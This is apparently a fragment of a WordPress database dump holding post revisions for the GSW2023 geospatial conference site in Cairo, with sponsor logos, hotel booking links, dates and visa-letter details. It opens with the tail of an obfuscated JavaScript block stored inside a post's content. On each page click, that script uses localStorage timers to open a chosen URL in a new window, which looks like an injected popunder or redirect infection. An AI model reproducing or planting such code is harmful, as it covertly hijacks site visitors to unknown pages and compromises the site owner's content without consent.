_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-25 02:18:29','2023-07-25 02:18:29','',3066,'https://gsw2023.com/?p=5046',0,'revision','',0),
(5047,1,'2023-07-25 02:18:45','2023-07-25 02:18:45','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251414155{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" 